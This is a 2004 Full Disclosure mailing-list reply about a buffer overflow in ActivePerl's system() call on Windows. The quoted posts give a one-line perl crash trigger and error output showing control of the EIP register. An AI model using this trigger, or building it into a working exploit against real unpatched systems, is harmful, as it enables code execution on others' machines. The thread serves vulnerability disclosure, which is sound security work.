Full Disclosure mailing list archives

Re: Re: Buffer Overflow in ActivePerl ?


From: npguy <npguy () websurfer com np>
Date: Tue, 18 May 2004 20:30:46 +0545

perl, v5.8.2 MSWin32-x86-multi-thread suffer the same.


Tuesday, May 18, 2004, 7:14:41 PM, you wrote:

NF> "Oliver () greyhat de" <Oliver () greyhat de> wrote:

i played around with ActiveState's ActivePerl for Win32, and crashed
Perl.exe with the following command:

perl -e "$a="A" x 256; system($a)"

NF> Ditto -- "v5.8.0 built for MSWin32-x86-multi-thread" on Win2K SP4 plus
NF> all but last week's security patch:

NF>    perl -e "$a="A" x 256; system($a)"

NF>    perl.exe - Application error

NF>    Unhandled instruction at "0x77fcc83d" referenced memory at
NF>    "0x00657865.  The memory could not be "written".

NF> Also, it is likely exploitable -- push up the number of A's a bit:

NF>    C:\>perl -e "$a="A" x 259; system($a)"

NF>    perl.exe - Application error

NF>    Unhandled instruction at "0x77fcc83d" referenced memory at
NF>    "0x65004141.  The memory could not be "written".

NF> and we seem to get control of EIP.  Coincidence?  Try yet two more:

NF>    C:\>perl -e "$a="A" x 261; system($a)"

NF>    perl.exe - Application error

NF>    Unhandled instruction at "0x77fcc83d" referenced memory at
NF>    "0x41414141.  The memory could not be "written".

NF> Looks like full control of EIP...

NF> However, there is not likely to be a privilege escalation here unless
NF> perhaps a script processor on a web server can be cajoled into doing
NF> something with this??  (Not at all familiar with the innards of Windows
NF> web servers and their relationship to their CGI, etc processors...)





       npguy                            npguy€websurfer.com.np

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Current thread: